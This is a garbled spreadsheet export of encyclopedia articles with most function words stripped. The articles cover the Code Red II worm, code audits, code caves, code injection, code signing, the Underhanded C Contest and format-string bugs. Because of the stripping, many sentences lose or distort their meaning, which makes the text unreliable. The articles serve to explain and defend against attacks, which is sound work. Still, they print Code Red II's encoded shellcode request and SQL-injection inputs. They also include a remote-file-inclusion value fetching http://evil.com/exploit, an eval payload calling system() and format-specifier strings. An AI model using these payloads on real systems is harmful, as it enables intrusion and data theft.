    <t>code computer worm similar code worm. released weeks code august 2001, similar behavior original, analysis showed worm instead variant. unlike first, second function attack; instead backdoor allows attacks. worm designed exploit security hole indexing software included part microsoft's internet information server (iis) server software. typical signature code worm appears server /default.ida?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3 %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a http/1.0 while original worm tried infect computers random, code tries infect machines subnet infected machine. microsoft released security patch june 2001, fixed security hole, however everyone patched servers, including microsoft themselves. also nimda timeline computer viruses worms references external links original analysis code analysis steve friedl analysis: codered worm analysis eeye digital security</t>
  </si>
  <si>
    <t>Code audit</t>
  </si>
  <si>
    <t>software code audit comprehensive analysis source code programming project intent discovering bugs, security breaches violations programming conventions. integral part defensive programming paradigm, attempts reduce errors software released. source code common code audited since many higher-level languages, python, fewer potentially vulnerable functions (e.g., functions check bounds). guidelines when auditing software, every critical component audited separately together entire program. good idea search high-risk vulnerabilities first work low-risk vulnerabilities. vulnerabilities high-risk low-risk generally exist depending situation source code question used. application penetration testing tries identify vulnerabilities software launching many known attack techniques possible likely access points attempt bring application. this common auditing method used find specific vulnerabilities exist, source code. some claim end-of-cycle audit methods tend overwhelm developers, ultimately leaving team long list known problems, little actual improvement; cases, in-line auditing approach recommended alternative. high-risk vulnerabilities some common high-risk vulnerabilities exist non-bounds-checking functions (e.g., strcpy, sprintf, vsprintf, sscanf) could lead buffer overflow vulnerability pointer manipulation buffers interfere later bounds checking, e.g.: ((bytesread net_read(buf,len)) bytesread; calls like execve(), execution pipes, system() similar things, especially called non-static arguments input validation, e.g. sql): statement "select from users where name username "';" example injection vulnerability file inclusion functions, e.g. php): include($page '.php'); example remote file inclusion vulnerability libraries linked malicious code, returning reference internal mutable data structure (record, array). malicious code modify structure retain reference observe future changes. low-risk vulnerabilities following list low-risk vulnerabilities found auditing code, produce high risk situation. client-side code vulnerabilities affect server side (e.g., cross-site scripting) username enumeration directory traversal sensitive keys tools source code auditing tools generally look common vulnerabilities work specific programming languages. such automated tools could used save time, relied in-depth audit. applying tools part policy-based approach recommended. dependency requirements threshold, software auditing tools detect vulnerabilities, especially code audited before. however actual importance alerts also depends application used. library linked malicious code (and must immune strict requirements like cloning returned data structures, intentional attempts break system expected. program exposed malicious input (like server backend) must first care input (buffer overruns, injection, etc.). such attacks never occur program internally used authorized users protected infrastructure. also information technology audit defensive programming remote file inclusion injection buffer overflow list tools static code analysis references</t>
  </si>
  <si>
    <t>Code cave</t>
  </si>
  <si>
    <t>code cave series unused bytes process's memory. code cave inside process's memory often reference section capacity injecting custom instructions. common uses concept code cave often employed hackers reverse engineers execute arbitrary code compiled program. helpful method make modifications compiled program example including additional dialog boxes, variable modifications even removal software validation checks. often using call instruction commonly found many architectures, code jumps subroutine pushes next address onto stack. after execution subroutine return instruction used previous location stack program counter. this allows existing program jump newly added code without making significant changes program flow itself. advantages easy fast this means modification process fast easy. when modifying existing code tools ollydbg, added functions assembled tested without external dependencies. need source using code caves extremely efficient even source code provided programmer. this allows programmer make adjustments adding removing functions code without rewrite entire program link external dependencies existing project. disadvantages easy break program many cases executable file modified. this means existing code cave existing script code injection lack resources provided script. replacement existing script lead program failure/crash. lack versatility injecting code existing script means limited space given allows simple instruction modifications language used assembly. this mitigated shared library injectors (dll injection [windows] ld_preload [linux]) injected library contains already compiled code existing instructions target binary simply modified tools pycave: simple tool find code caves portable executable (pe) files. ollydbg: debugger code analysis. traces script calls executes, well displays iterations libraries binaries. code injected removed into/from file directly debugger. explorer: allows user open edit executable files called files (portable executable files). this includes .exe, .dlls less common file types. cheat engine: powerful tool reads process memory writes process memory. this means client-side data values changed edited. also display changes values. tsearch: powerful tool reads process memory writes process memory. like cheat engine, change client-side values data. references external links code cave explanation german</t>
  </si>
  <si>
    <t>Code golf</t>
  </si>
  <si>
    <t>code golf type recreational computer programming competition participants strive achieve shortest possible source code solves certain problem. code golf challenges tournaments also named programming language used (for example, perl golf). history length shortest possible program produces given output fixed programming language) known kolmogorov complexity output, mathematical study dates work andrey kolmogorov 1963. code golf, however, general this, often specifies general input-output transformation must performed rather asking single output input. whilst term "code golf" apparently first used 1999 perl, later popularised perl write program performed encryption, similar informal competition known popular earlier hackers. challenging nature aggressively optimizing program size long recognized; example, 1962 coding manual regnecentralen's gier computer notes time-consuming sport code least possible number instructions" recommends practical programming. today term grown cover wide variety languages, even triggered creation dedicated golfing languages. etymology term "code golf" derived similarity goal conventional golf, participants seek achieve lowest possible score, rather highest, standard sports game scoring systems. while conventional golf players trying minimize number club strokes needed complete course, code golfers striving reduce number strokes necessary write program. dedicated golfing languages several languages created specifically code golfing mind. examples include golfscript, flogscript vyxal, turing-complete languages provide constructs concisely expressing ideas code. because golfing languages compete extreme brevity, design sacrifices readability, important practical production environments, therefore often esoteric. sometimes, however, language designed practical purpose, turns suitable code golf. example golfscript code print 1000 digits this prints string starting "3141592653" followed digits code golf websites include novel golfing languages created users code golf challenges. other popular languages include 05ab1e, husk, pyth, cjam jelly. types code golf some code golf questions, posed general programming sites, require implementation specific programming language. however, limits style problems possible problem designers pose (for example, limiting certain language features). addition, creation "open" questions resulted design code golf specific programming language dialects rebmu dialect rebol). both online live competitions also include time limits. also code poetry data compression minification (programming) perl pastimes kolmogorov complexity kata (programming) references external links codegolf.stackexchange.com: questions answers programming puzzles code golf list dedicated golfing languages regular expression golfing: variant code golf shortestwikicontest reverse code golf (xkcd)</t>
  </si>
  <si>
    <t>Code injection</t>
  </si>
  <si>
    <t>code injection exploitation computer caused processing invalid data. injection used attacker introduce "inject") code vulnerable computer program change course execution. result successful code injection disastrous, example, allowing computer viruses computer worms propagate. code injection vulnerabilities occur application sends untrusted data interpreter. injection flaws often found sql, ldap, xpath, nosql queries, commands, parsers, smtp headers, program arguments, etc. injection flaws tend easier discover examining source code testing. scanners fuzzers help find injection flaws.injection result data loss corruption, lack accountability, denial access. injection sometimes lead complete host takeover. certain types code injection errors interpretation, giving special meaning user input. similar interpretation errors exist outside world computer science comedy routine who's first?. routine, failure distinguish proper names regular words. likewise, types code injection, failure distinguish user input system commands. code injection techniques popular system hacking cracking gain information, privilege escalation unauthorized access system. code injection used malevolently many purposes, including: arbitrarily modifying values database injection. impact range website defacement serious compromise sensitive data. installing malware executing malevolent code server injecting server scripting code (such asp). privilege escalation root permissions exploiting shell injection vulnerabilities setuid root binary unix, local system exploiting service microsoft windows. attacking users html/script injection (cross-site scripting).in 2008, 5.66% vulnerabilities reported year classified code injection, highest year record. 2015, decreased 0.77%. benign unintentional code injection used good intentions; example, changing tweaking behavior program system code injection cause system behave certain without malicious intent. code injection could, example: introduce useful column appear original design search results page. offer filter, order, group data using field exposed default functions original design. regards programs like dropbox, special parts could used connect online resources offline program. utilize linux dynamic linker define function name certain libc functions, link function library, override libc function.some users unsuspectingly perform code injection input provide program considered originally developed system. example: what user consider valid input contain token characters character strings reserved developer special meaning (perhaps "shannon jason," quotation marks "bub 'slugger' mccracken"). user submit malformed file input handled gracefully application, toxic receiving system.another benign code injection could discovery injection flaws themselves, intention fixing flaws. this known white penetration test. preventing problems prevent code injection problems, utilize secure input output handling, using apis that, used properly, secure input characters. parameterized queries (also known "compiled queries", "prepared statements", "bound variables") allows moving user data string interpreted. additionally criteria similar apis move away concept command strings created interpreted. enforcing language separation static type system. input validation, whitelisting known good values, done client side using javascript example done server side secure. input encoding, e.g. escaping dangerous characters. instance, php, using htmlspecialchars() function escape special characters safe output text html, mysqli::real_escape_string() isolate data included request, protect injection. output encoding, i.e. preventing html injection (xss) attacks site visitors httponly flag http cookies that, set, allow client-side script interaction cookies, thereby preventing certain attacks. modular shell disassociation kernel with injection, parameterized queries, stored procedures, whitelist input validation, help mitigate code injection problems.the solutions listed deal primarily web-based injection html script code server-side application. other approaches must taken, however, dealing injection user code user machine, resulting privilege elevation attacks. some approaches used detect isolate managed unmanaged code injections are: runtime image hash validation capture hash part complete image executable loaded memory, compare stored expected hash. user data stored special memory sections marked non-executable. processor made aware code exists part memory, refuses execute anything found there. canaries randomly place values stack. runtime, canary checked function returns. canary modified, program stops execution exits. this occurs stack overflow attack. c]code pointer masking (cpm) loading (potentially changed) code pointer register, apply bitmask pointer. this effectively restricts addresses pointer refer. examples injection injection takes advantage syntax inject malicious commands read modify database, compromise meaning original query.for example, consider page fields allow users enter user name password. code behind page generate query check password list user names: query returns rows, access granted. however, malicious user enters valid username injects valid code (password' '1'='1) password field, resulting query look like this: example above, "password" assumed blank innocuous string. "'1'='1'" always true many rows returned, thereby allowing access. technique refined allow multiple statements run, even load external programs. assume query following format:if adversary following inputs: userid: ';drop table user; password: 'or"=' query parsed result table user removed database. this occurs symbol signifies command start one. signifies start comment. cross-site scripting code injection malicious injection introduction code application. some servers guestbook script, accepts small messages users, typically receives messages very nice site! however malicious person know code injection vulnerability guestbook, enters message another user views page injected code executed. this code allow attacker impersonate another user. however software accidentally triggered unassuming user cause website display html code. html script injection popular subject, commonly termed "cross-site scripting" "xss". refers injection flaw whereby user input script something along lines placed output html, without checked html code scripting. many problems related erroneous assumptions input data possible, effects special data. server side template injection template engines often used modern application display dynamic data. however, trusting validated user data frequently lead critical vulnerabilities server side template injections. while vulnerability similar cross-site scripting, template injection leverage execute code server rather visitor's browser. abuses common workflow applications often user inputs templates render page. example shows concept. here template {{visitor_name}} replaced data rendering process.an attacker workflow inject code rendering pipeline providing malicious visitor_name. depending implementation application, could choose inject {{7*'7'}} renderer could resolve hello 7777777. note actual server evaluated malicious code therefore could vulnerable remote code execution. dynamic evaluation vulnerabilities eval() injection vulnerability occurs attacker control part input string eval() function call. argument "eval" processed php, additional commands appended. example, "arg" "10; system('/bin/echo uh-oh')", additional code executes program server, case "/bin/echo". object injection allows serialization deserialization whole objects. untrusted input allowed deserialization function, possible overwrite existing classes program execute malicious attacks. such attack joomla found 2013. remote file injection consider program (which includes file specified request): example might read color-files like blue.php red.php could loaded, attackers might provide color=http://evil.com/exploit causing load external file. format specifier injection format string bugs commonly appear programmer wishes print string containing user supplied data. programmer mistakenly write printf(buffer) instead printf("%s", buffer). first version interprets buffer format string, parses formatting instructions contain. second version simply prints string screen, programmer intended. consider following short program local variable char array password holds password; program asks user integer string, echoes user-provided string.if user input filled list format specifiers %s%s%s%s%s%s%s%s printf()will start reading stack. eventually, format specifier access address password stack, print password1 screen. shell injection shell injection command injection) named unix shells, applies systems allow software programmatically execute command line. here example vulnerable tcsh script: stored executable file ./check, shell command ./check evil" attempt execute injected shell command evil instead comparing argument constant one. here, code attack code trying check parameter, code might trying validate parameter order defend attack.any function used compose shell command potential vehicle launching shell injection attack. among system(), startprocess(), system.diagnostics.process.start(). client–server systems browser interaction servers potentially vulnerable shell injection. consider following short program server external program called funnytext replace word user sent word. passthru composes shell command executed server. since part command composes taken provided browser, allows inject malicious shell commands. inject code program several ways exploiting syntax various shell features (this list exhaustive): some languages offer functions properly escape quote strings used construct shell commands: php: escapeshellarg() escapeshellcmd() python: shlex.quote()however, still puts burden programmers know/learn functions remember make every time shell commands. addition using functions, validating sanitizing user input also recommended. safer alternative apis execute external programs directly, rather shell, thus preventing possibility shell injection. however, apis tend support various convenience features shells, and/or cumbersome/verbose compared concise shell-syntax. also arbitrary code execution buffer overflow debugging file inclusion vulnerability gadget (machine instruction sequence) mobile code monitor sgml entity shellshock (software bug) injection trojan horse (computing) unintended instructions skimming references external links article "defending injection attacks context-sensitive string evaluation (csse)" tadeusz pietraszek chris vanden berghe news article "flux spreads wider" first trojan horse make code injection prevent detection firewall daily regularly reports real-world incidences susceptibility code injection software.</t>
  </si>
  <si>
    <t>Code mobility</t>
  </si>
  <si>
    <t>distributed computing, code mobility ability running programs, code objects migrated moved) machine application another. this process moving mobile code across nodes network opposed distributed computation data moved. common practice distributed systems require movement code processes parts system, instead data.examples code mobility include scripts downloaded network (for example javascript, vbscript), java applets, activex controls, flash animations, shockwave movies (and xtras), macros embedded within microsoft office documents. overview purpose code mobility support sophisticated operations. example, application send object another machine, object resume executing inside application remote machine state originating application. according classification proposed fuggetta, picco vigna, code mobility either strong weak: strong code mobility involves moving code, data execution state host another, notably process image (this important cases running application needs maintain state migrates host host), weak code mobility involves moving code data only. therefore, necessary restart execution program destination host. several paradigms, architectural styles, exist within code mobility: remote evaluation client sends code remote machine execution. code demand client downloads code remote machine execute locally. mobile agents objects code ability migrate machines autonomously. implementations within code mobility, mobile agent paradigm conventionally attracted interest research, however recent work produced general purpose implementations. mobile agent frameworksaglets mobile agent framework, java java agent development framework mobile agent framework, java mobile-c mobile agent platform, c/c++ mobile code also encapsulated embedded file formats traditionally associated executable code. example form encapsulation presence javascript pdf. viruses mobile code also download execute client workstation email. mobile code download email attachment (e.g., macro word file) html email body (e.g., javascript). example, iloveyou, truelove, annak emails viruses/worms implemented mobile code (vbscript .vbs email attachment executed windows scripting host). almost situations, user aware mobile code downloading executing workstation. renting code mobile code also refers code "used rent", making software packages affordable. i.e. demand. this specially relevant mobile devices developed cellular phones, pdas, etc. one. instead installing software packages, "leased" paid per-usage basis. also code demand mobile agent remote evaluation references</t>
  </si>
  <si>
    <t>Code morphing</t>
  </si>
  <si>
    <t>code morphing approach used obfuscating software protect software applications reverse engineering, analysis, modifications, cracking. this technology protects intermediate level code compiled java .net languages (oxygene, visual basic, etc.) rather binary object code. code morphing breaks protected code several processor commands small command snippets replaces others, maintaining result. thus protector obfuscates code intermediate level.code morphing multilevel technology containing hundreds unique code transformation patterns. addition technology transforms intermediate layer commands virtual machine commands (like p-code). code morphing protect runtime tracing, reveal execution logic protected code. unlike code protectors, concept code decryption method. protected code blocks always executable state, executed (interpreted) transformed code. original intermediate code absent certain degree, deobfuscation still give clear view original code flow. code morphing also used refer just-in-time compilation technology used transmeta processors crusoe efficeon implement instruction architecture. code morphing often used obfuscating copy protection checks program makes determine whether valid, authentic installation, unauthorized copy, order make removal copy-protection code difficult would otherwise case. also intermediate language references</t>
  </si>
  <si>
    <t>Comparison of application virtualization software</t>
  </si>
  <si>
    <t>application virtualization software refers application virtual machines software responsible implementing them. application virtual machines typically used allow application bytecode portably many different computer architectures operating systems. application usually computer using interpreter just-in-time compilation (jit). there often several implementations given virtual machine, covering different functions. comparison virtual machines javascript machines included. list ecmascript engines find them.the table summarizes elements virtual machine designs intended efficient, list abilities present implementation. virtual machine instructions process data local variables using main model computation, typically stack machine, register machine, random access machine often called memory machine. three methods motivated different tradeoffs virtual machines physical machines, ease interpreting, compiling, verifying security. memory management portable virtual machines addressed higher level abstraction physical machines. some virtual machines, popular java virtual machines (jvm), involved addresses require safe automatic memory management allowing virtual machine trace pointer references, disallow machine instructions manually constructing pointers memory. other virtual machines, llvm, like traditional physical machines, allowing direct manipulation pointers. common intermediate language (cil) offers hybrid between, allowing controlled memory (like jvm, allows safe automatic memory management), also allowing 'unsafe' mode allows direct pointer manipulation ways violate type boundaries permission. code security generally refers ability portable virtual machine code offering prescribed abilities. example, virtual machine might allow code access certain functions data. controls pointers make automatic memory management possible allow virtual machine ensure typesafe data access used assure code fragment allowed certain elements memory cannot bypass virtual machine itself. other security mechanisms layered code verifiers, stack verifiers, methods. interpreter allows programs made virtual instructions loaded immediately without potentially costly compile native machine instructions. virtual machine interpreted, column designation refers whether design includes provisions efficient interpreting (for common usage). just-in-time compilation (jit), refers method compiling native instructions latest possible time, usually immediately running program. challenge implementation virtual machine design, however, modern designs begun make considerations help efficiency. simplest methods simply compile code fragment similar offline compiler. however, complex methods often employed, specialize compiled code fragments parameters known runtime (see adaptive optimization). ahead-of-time compilation (aot) refers classic method using precompiler generate native instructions change runtime program. because aggressive compiling optimizing take time, precompiled program launch faster relies alone execution. implementations mitigated startup cost initial interpreting speed launch times, native code fragments generated jit. shared libraries facility reuse segments native code across multiple running programs. modern operating systems, generally means using virtual memory share memory pages containing shared library across different processes protected memory protection. interesting aggressive methods adaptive optimization often produce code fragments unsuitable sharing across processes successive runs program, requiring tradeoff made efficiencies precompiled shared code advantages adaptively specialized code. example, several design provisions present allow efficient shared libraries, possibly cost specialized code. implementation uses java shared archive provide benefits shared libraries. comparison application virtual machine implementations addition portable virtual machines described above, virtual machines often used execution model individual scripting languages, usually interpreter. this table lists specific virtual machine implementations, portable virtual machines, scripting language virtual machines. also application virtualization language binding foreign function interface calling convention name mangling application programming interface (api) application binary interface (abi) comparison platform virtualization software list ecmascript engines webassembly references</t>
  </si>
  <si>
    <t>Code signing</t>
  </si>
  <si>
    <t>code signing process digitally signing executables scripts confirm software author guarantee code altered corrupted since signed. process employs cryptographic hash validate authenticity integrity.code signing provide several valuable features. common code signing provide security deploying; programming languages, also used help prevent namespace conflicts. almost every code signing implementation provide sort digital signature mechanism verify identity author build system, checksum verify object modified. also used provide versioning information object store meta data object.the efficacy code signing authentication mechanism software depends security underpinning signing keys. public infrastructure (pki) technologies, integrity system relies publishers securing private keys unauthorized access. keys stored software general-purpose computers susceptible compromise. therefore, secure, best practice, store keys secure, tamper-proof, cryptographic hardware devices known hardware security modules hsms. providing security many code signing implementations provide sign code using system involving pair keys, public private, similar process employed ssh. example, case .net, developer uses private sign libraries executables time build. this unique developer group sometimes application object. developer either generate obtain trusted certificate authority (ca).code signing particularly valuable distributed environments, source given piece code immediately evident example java applets, activex controls active browser scripting code. another important usage safely provide updates patches existing software. windows, linux distributions provide updates using code signing ensure possible others maliciously distribute code patch system. allows receiving operating system verify update legitimate, even update delivered third parties physical media (disks). code signing used windows authenticate software first run, ensuring software maliciously tampered third-party distributor download site. this form code signing used linux platform's decentralized nature, package manager predominant mode distribution forms software (not updates patches), well open-source model allowing direct inspection source code desired. debian-based linux distributions (among others) validate downloaded packages using public cryptography. trusted identification using certificate authority (ca) public used authenticate code signature traceable back trusted root authority preferably using secure public infrastructure (pki). this ensure code trusted, comes stated source explicitly, particular private key). provides root trust level able assign trust others proxy. user trusts user presumably trust legitimacy code signed generated proxies. many operating systems frameworks contain built-in trust certification authorities. also commonplace large organizations implement private internal organization, provides features public cas, trusted within organization. extended validation (ev) code signing extended validation (ev) code signing certificates subject additional validation technical requirements. these guidelines based ca/b forum's baseline requirements extended validation guidelines. addition validation requirements specific code signing guidelines stipulate "the subscriber’s private generated, stored used crypto module meets exceeds requirements fips 140-2 level 2."certain applications, signing windows kernel-mode drivers, require code signing certificate. additionally, microsoft's ieblog states windows programs "signed code signing certificate immediately establish reputation smartscreen reputation services even prior reputation exists file publisher." sample code signing certificate this example decoded code signing certificate used ssl.com sign software. ssl.com code signing intermediate shown issuer's commonname, identifying code signing certificate. certificate's subject field describes corp organization. code signing shown sole x509v3 extended usage. certificate: data: version: (0x2) serial number: 59:4e:2d:88:5a:2c:b0:1a:5e:d6:4c:7b:df:35:59:7d signature algorithm: sha256withrsaencryption issuer: commonname ssl.com code signing intermediate organizationname corp localityname houston stateorprovincename texas countryname validity before: 20:29:13 2019 after 20:29:13 2022 subject: 1.3.6.1.4.1.311.60.2.1.3 1.3.6.1.4.1.311.60.2.1.2 nevada streetaddress 3100 richmond businesscategory private organization postalcode 77098 commonname corp serialnumber nv20081614243 organizationname corp localityname houston stateorprovincename texas countryname subject public info: public algorithm: rsaencryption public-key: (2048 bit) modulus: 00:c3:e9:ae:be:d7:a2:6f:2f:24 exponent: 65537 (0x10001) x509v3 extensions: x509v3 authority identifier: keyid:36:bd:49:ff:31:2c:eb:af:6a:40:fe:99:c0:16:ed:ba:fc:48:dd:5f authority information access: issuers uri:http://www.ssl.com/repository/sslcom-subca-ev-codesigning-rsa-4096-r3.crt ocsp uri:http://ocsps.ssl.com x509v3 certificate policies: policy: 2.23.140.1.3 policy: 1.2.616.1.113527.2.5.1.7 policy: 1.3.6.1.4.1.38064.1.3.3.2 cps: https://www.ssl.com/repository x509v3 extended usage: code signing x509v3 distribution points: full name: uri:http://crls.ssl.com/sslcom-subca-ev-codesigning-rsa-4096-r3.crl x509v3 subject identifier: ec:6a:64:06:26:a7:7a:69:e8:cc:06:d5:6f:fa:e1:c2:9a:29:79:de x509v3 usage: critical digital signature signature algorithm: sha256withrsaencryption 17:d7:a1:26:58:31:14:2b:9f:3b alternative model trust first model, developers choose provide self-generated key. scenario, user would normally obtain public fashion directly developer verify object first time. many code signing systems store public inside signature. some software frameworks check code's signature executing allow choose trust developer point first run. application developer provide similar system including public keys installer. used ensure subsequent objects need run, upgrades, plugins, another application, verified coming developer. time-stamping time-stamping designed circumvent trust warning appear case expired certificate. effect, time-stamping extends code trust beyond validity period certificate.in event certificate revoked compromise, specific date time compromising event become part revocation record. case, time-stamping helps establish whether code signed certificate compromised. code signing xcode developers need sign tvos apps running real device uploading store. this needed prove developer owns valid apple developer application needs valid profile certificate devices. problems like security measure, code signing defeated. users tricked running unsigned code, even running code refuses validate, system remains secure long private remains private.it also important note code signing protect user malicious activity unintentional software bugs software author merely ensures software modified anyone author. sometimes, sandbox systems accept certificates, false time-stamp excess usage ram. implementations microsoft implements form code signing (based authenticode) provided microsoft tested drivers. since drivers kernel, destabilize system open system security holes. reason, microsoft tests drivers submitted whql program. after driver passed, microsoft signs version driver safe. 32-bit systems only, installing drivers validated microsoft possible agreeing allow installation prompt warning user code unsigned. .net (managed) code, additional mechanism called strong name signing uses public/private keys sha-1 hash opposed certificates. however, microsoft discourages reliance strong name signing replacement authenticode. unsigned code gaming consumer devices context consumer devices games consoles, term "unsigned code" often used refer application signed cryptographic normally required software accepted executed. most console games signed secret designed console maker game load console. there several methods unsigned code execute include software exploits, modchip, technique known swap trick running softmod. initially seem obvious simply copying signed application onto another allow boot. xbox, reason xbox executable file (xbe) contains media-type flag, specifies type media bootable from. nearly xbox software, executable boot factory-produced discs, simply copying executable burnable media enough stop execution software. however, since executable signed, simply changing value flag possible alters signature executable, causing fail validation checked. also digital signature jailbreaking playstation portable homebrew privilege escalation rooting (android symbian security bypass references external links apple code signing guide microsoft introduction code signing debian security infrastructure strong distribution howto</t>
  </si>
  <si>
    <t>Underhanded C Contest</t>
  </si>
  <si>
    <t>underhanded contest programming contest turn code malicious, passes rigorous inspection, looks like honest mistake even discovered. contest rules define task, malicious component. entries must perform task malicious manner defined contest, hide malice. contestants allowed c-like compiled languages make programs.the contest organized scott craver department electrical engineering binghamton university. contest initially inspired daniel horn's obfuscated contest fall 2004. 2005 2008 contests, prize $100 gift certificate thinkgeek. 2009 contest prize increased $200 late announcement winners, prize 2013 contest also $200 gift certificate. contests 2005 2005 contest task basic image processing, resampling smoothing, covertly inserting unique useful "fingerprinting" data image. winning entries 2005 used uninitialized data structures, reuse pointers, embedding machine code constants. 2006 2006 contest required entries count word occurrences, vastly different runtimes different platforms. accomplish task, entries used fork implementation errors, optimization problems, endian differences various implementation differences. winner called strlen() loop, leading quadratic complexity optimized linux compiler windows. 2007 2007 contest required entries encrypt decrypt files strong, readily available encryption algorithm percentage 0.01%) encrypted files cracked reasonably short time. contest commenced april ended july entries used misimplementations rc4, misused calls, incorrect function prototypes. 2008 2008 contest required entries redact rectangular portion image portion reconstructed. method "blocking out" rectangle allowed, long original pixels removed, pixel reconstruction perfect (although reconstruction's fidelity original file would factor judging). contest began june ended september entries tended either region retrievable pseudo-random mask append masked data file format. placing programs used improperly defined macros winner, choosing work uncommon text based format, zeroed pixel values keeping number digits intact. 2009 2009 contest required participants write program sifts routing directives redirects piece luggage based innocuous-looking comment space-delimited input data file. contest began december 2009, march 2010. however, activity occurred three years. winners announced april 2013, overall winner runners-up. 2013 2013 contest announced april 2013, july 2013; results announced september 2014. fictional social website called "obsessbook". challenge write function compute derpcon (degrees edge-reachable personal connection) users "accidentally" computes distance special user. 2014 2014 contest announced november 2014, january 2015. results announced june 2015. object write surveillance code twitter-like social networking service, comply secret government surveillance request; non-obvious reasons, code must subtly leak surveillance user. general approach obfuscate writes user data writing surveillance data, winning entry implementing buggy time-checking function overwrites input. 2015 2015 contest announced august 2015, november 2015. results announced january 2016. scenario nuclear disarmament process peoples glorious democratic republic alice glorious democratic peoples republic (alice bob), mission write test function comparing potentially fissile material reference sample, certain circumstances would label warhead containing fissile material doesn't. around third submissions used poisoning erroneous floating-point operations, generates nan's later computation always evaluates false comparison. winning entry used confusion datatypes double float distort values. also international obfuscated code contest references external links official contest page prior page 2014 winners</t>
  </si>
  <si>
    <t>Underclocking</t>
  </si>
  <si>
    <t>underclocking, also known downclocking, modifying computer electronic circuit's timing settings lower clock rate specified. underclocking used reduce computer's power consumption, increase battery life, reduce heat emission, also increase system's stability, lifespan/reliability compatibility. underclocking implemented factory, many computers components underclocked user. types underclocking microprocessors, purpose generally decrease need heat dissipation devices decrease electrical power consumption. this provide increased system stability high-heat environments, allow system lower airflow (and therefore quieter) cooling without all. example, pentium processor normally clocked "underclocked" safely reduced speeds. this invariably comes expense system performance. however, proportional performance reduction usually less proportional reduction clock speed performance often limited bottlenecks: hard disk, gpu, disk controller, internet, network, etc. underclocking refers alterations timing synchronous circuit order lower device's energy needs. deliberate underclocking involves limiting processor's speed, affect speed operations, make device noticeably less able, depending hardware desired use. many computers devices allow underclocking. manufacturers underclocking options many reasons. underclocking help excessive heat buildup, lower performance generate much heat inside device. also lower amount energy needed device. laptop computers battery-operated devices often underclocking settings, batteries last longer without charged. addition providing underclocking features, manufacturers choose limit capability machine order make efficient. reduced instruction computer (risc) models help makers build devices work less power. graphics cards underclocking also performed graphics card processor's gpus, usually reducing heat output. instance, possible lower clock rates performing everyday tasks (e.g. internet browsing word processing), thus allowing card operate lower temperature thus lower, quieter speeds. overclocked graphically intense applications, games. underclocking reduce performance, decrease probably noticeable except graphically intensive applications. memory underclocking newer faster underclocked match older systems inexpensive replace rare discontinued memory. this might also necessary stability problems encountered higher settings, especially several memory modules different clock speed. underclock processor, change clock factor multiplier (the ratio processor memory clock speed), memory also underclocked. when used dynamic frequency scaling (automatic underclocking) common laptop computers become common desktop computers well. laptops, processor usually underclocked automatically whenever computer operating batteries. most modern notebook desktop processors (utilizing power-saving schemes like amd's cool'n'quiet powernow!) underclock automatically light processing load, machine bios operating system support intel also used method numerous processors feature called speedstep. speedstep first appeared chips like core selective pentium models, later becoming standard high-end core models. some processors underclock automatically defensive measure, prevent overheating could cause permanent damage. when processor reaches temperature level deemed high safe operation, thermal control circuit activates, automatically decreasing clock core voltage temperature returned safe level. properly cooled environment, mechanism trigger rarely ever). there several different underclocking competitions similar format overclocking competitions, except goal lowest clocked computer, opposed highest. advantages reduced electrical power consumption, especially combined undervolting (i.e., reducing component's voltage nominal). instance, underclocking athlon 1700+ processor 1466 1000 reducing core voltage 1.75 1.15v, computer user reduced power consumption 64.0 21.6w, i.e., power reduction, less performance. true newer processors: when single-core intel underclocked, pc's performance power reduction.in general, power consumed capacitance running frequency voltage approximately {\displaystyle p=cv^{2}f.} reduced heat generation, exactly proportional power consumption. less noise cooling fans slowed down, even eliminated. cooling fan's efficiency proportional rotation speed, increases, noise. longer hardware lifespan. increased stability. increased battery life. better compatibility applications. proper performance computer games dependent timing. practice linux linux kernel supports frequency modulation. supported processors, using cpufreq gain access feature gives system administrator variable level control cpu's clock rate. kernel includes five governors default: conservative, ondemand, performance, powersave, userspace. conservative ondemand governors adjust clock rate depending load, different algorithms. ondemand governor jumps maximum frequency load decreases frequency step step idle, whereas conservative governor increases frequency step step load jumps lowest frequency idle. performance, powersave userspace governors clock rate statically: performance highest available, powersave lowest available, userspace frequency determined controlled user. windows underclocking done manually bios windows applications, dynamically using features intel's speedstep amd's cool'n'quiet. windows underclocking within "advanced" settings power management plan. asus earlier models asus used intel celeron processor underclocked mhz. underclocking performed efi. smartphones pdas most smartphones pdas, motorola droid, palm pre, apple iphone, underclocking powerful processor, rather full clocking less powerful processor, maximize battery life. designers mobile devices often discover slower processor gives worse battery life powerful processor lower clock rate. they select processor basis performance watt processor. performance performance underclocked machine often better might expected. under normal desktop use, full power rarely needed. even system busy, large amount time usually spent waiting data memory, disk, devices. such devices communicate operates much lower bandwidth. generally, lower multiplier (and thus clockrate cpu), closer performance bus, less time spend waiting. also big.little references external links "undervolting" "underclocking" primer from silentpcreview.com "underclocking" game classic tutorial</t>
  </si>
  <si>
    <t>Uncontrolled format string</t>
  </si>
  <si>
    <t>uncontrolled format string type software vulnerability discovered around 1989 used security exploits. originally thought harmless, format string exploits used crash program execute harmful code. problem stems unchecked user input format string parameter certain functions perform formatting, printf(). malicious user format tokens, among others, print data call stack possibly locations memory. also write arbitrary data arbitrary locations using format token, commands printf() similar functions write number bytes formatted address stored stack. details typical exploit uses combination techniques take control instruction pointer (ip) process, example forcing program overwrite address library function return address stack pointer malicious shellcode. padding parameters format specifiers used control number bytes output token used bytes stack beginning format string reached. start format string crafted contain address format token overwrite address malicious code execute. this common vulnerability format bugs previously thought harmless resulted vulnerabilities many common tools. mitre's project lists roughly vulnerable programs june 2007, trend analysis ranks most-reported vulnerability type 2001 2006.format string bugs commonly appear programmer wishes output string containing user supplied data (either file, buffer, user). programmer mistakenly write printf(buffer) instead printf("%s", buffer). first version interprets buffer format string, parses formatting instructions contain. second version simply prints string screen, programmer intended. both versions behave identically absence format specifiers string, makes easy mistake unnoticed developer. format bugs arise argument passing conventions type-safe. particular, varargs mechanism allows functions accept number arguments (e.g. printf) "popping" many arguments call stack wish, trusting early arguments indicate many additional arguments popped, types. format string bugs occur programming languages besides perl, although appear less frequency 